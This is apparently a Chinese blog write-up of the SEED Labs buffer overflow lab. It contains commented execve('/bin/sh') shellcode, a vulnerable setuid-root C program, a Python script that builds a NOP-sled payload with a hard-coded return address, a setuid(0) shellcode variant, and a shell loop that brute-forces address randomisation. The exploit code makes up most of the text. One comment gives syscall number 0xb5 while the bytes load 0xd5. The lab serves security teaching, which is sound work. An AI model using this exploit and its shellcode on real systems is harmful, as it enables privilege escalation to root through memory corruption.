标签：bin 10 char 30 argv SeedUbuntu16.04 eax ebx stack

sudo sysctl -w kernel.randomize_va_space=0

gcc -fno-stack-protector example.c

gcc -z execstack -o test test.c

/* call_shellcode.c /
/
设置四个寄存器eax，ebx，ecx，edx
eax保存execve的系统调用号11
ebx保存命令字符串的地址/bin/sh
ecx保存argv地址，argc[0]="/bin/sh",argv[1]=\0
edx保存传递给新程序环境变量的地址，此处为0
*/

include <stdlib.h>

include <stdio.h>

include <string.h>

const char code[] =
//设置ebx
"\x31\xc0" //xorl %eax,%eax，利用异或操作将eax设置为0，避免在code代码中出现0
"\x50" // pushl %eax 将/bin/sh末尾结束符0先压栈
"\x68""//sh" // pushl $0x68732f2f 把//sh压入栈中
"\x68""/bin" // pushl $0x6e69622f 把/bin压入栈中，此时/bin/sh字符串已经完全压入栈中，esp栈帧指针指向字符串起始位置
"\x89\xe3" // movl %esp,%ebx 将esp赋给ebx

//设置ecx
"\x50" // pushl %eax 设置argv[1]
"\x53" // pushl %ebx 设置argv[0]，此时esp指向argv首地址
"\x89\xe1" // movl %esp,%ecx 将esp赋给ecx

//设置edx
"\x99" //cdq 间接设置edx为0

//设置eax
"\xb0\x0b" // movb $0x0b 将eax寄存器的值设置为11（exec的系统调用号）
"\xcd\x80" // int $0x80 调用该系统调用
;
int main(int argc, char **argv)
{
char buf[sizeof(code)];
strcpy(buf, code);
((void(*)( ))buf)( );//
}

gcc -z execstack -o call_shellcode call_shellcode.c

/*stack.c */

include <stdlib.h>

include <stdio.h>

include <string.h>

/* Changing this size will change the layout of the stack.

• Instructors can change this value each year, so students
• won’t be able to use the solutions from the past.
• Suggested value: between 0 and 400 */

ifndef BUF_SIZE

define BUF_SIZE 24

endif

int bof(char str)
{
char buffer[BUF_SIZE];
/ The following statement has a buffer overflow problem */
strcpy(buffer, str); ➀
return 1;
}
int main(int argc, char **argv)
{
char str[517];
FILE badfile;
/ Change the size of the dummy array to randomize the parameters
for this lab. Need to use the array at least once */
char dummy[BUF_SIZE]; memset(dummy, 0, BUF_SIZE);
badfile = fopen("badfile", "r");
fread(str, sizeof(char), 517, badfile);
bof(str);
printf("Returned Properly\n");
return 1;
}

$ gcc -o stack -z execstack -fno-stack-protector stack.c
$ sudo chown root stack
$ sudo chmod 4755 stack

import sys
shellcode= (
"\x31\xc0" # xorl %eax,%eax
"\x50" # pushl %eax
"\x68""//sh" # pushl $0x68732f2f
"\x68""/bin" # pushl $0x6e69622f
"\x89\xe3" # movl %esp,%ebx
"\x50" # pushl %eax
"\x53" # pushl %ebx
"\x89\xe1" # movl %esp,%ecx
"\x99" # cdq
"\xb0\x0b" # movb $0x0b,%al
"\xcd\x80" # int $0x80
"\x00"
).encode(’latin-1’)

产生517byte的字节数组并用NOP填满

content = bytearray(0x90 for i in range(517))

将shellcode放在文件的末尾

start = 517 - len(shellcode)
content[start:] = shellcode

构造返回地址并将返回地址放在合适的位置

ret = 0xbfffeb48 + 100# 构造返回地址，为调试结果中的ebp+4
offset = 36 #返回地址区域到buffer基地址的偏移量
content[offset:offset + 4] = (ret).to_bytes(4,byteorder=’little’)

将内容写到badfile中

with open(’badfile’, ’wb’) as f:
f.write(content)

sudo ln -sf /bin/dash /bin/sh

// dash_shell_test.c

include <stdio.h>

include <sys/types.h>

include <unistd.h>

int main()
{
char *argv[2];
argv[0] = "/bin/sh";
argv[1] = NULL;
// setuid(0); ➀
execve("/bin/sh", argv, NULL);
return 0;
}

char shellcode[] =
"\x31\xc0" # xorl %eax,%eax 将eax寄存器内容置0
"\x31\xdb" # xorl %ebx,%ebx 将ebx寄存器内容置0
"\xb0\xd5" # movb $0xd5,%al 将eax设置为setuid的系统调用号0xb5
"\xcd\x80" # int $0x80 执行系统调用setuid（0），将真实用户id改为root

以下代码同任务二

"\x31\xc0"
"\x50"
"\x68""//sh"
"\x68""/bin"
"\x89\xe3"
"\x50"
"\x53"
"\x89\xe1"
"\x99"
"\xb0\x0b"
"\xcd\x80"

sudo /sbin/sysctl -w kernel.randomize_va_space=2

!/bin/bash

SECONDS=0SEED Labs – Buffer Overflow Vulnerability Lab 10
value=0
while [ 1 ]
do
value=$(( $value + 1 ))
duration=$SECONDS
min=$(($duration / 60))
sec=$(($duration % 60))
echo "$min minutes and $sec seconds elapsed."
echo "The program has been running $value times so far."
./stack
done

sudo /sbin/sysctl -w kernel.randomize_va_space=0

gcc -o stack -z execstack stack.c

标签：bin,10,char,30,argv,SeedUbuntu16.04,eax,ebx,stack
From： https://www.cnblogs.com/shenyvjie/p/16841476.html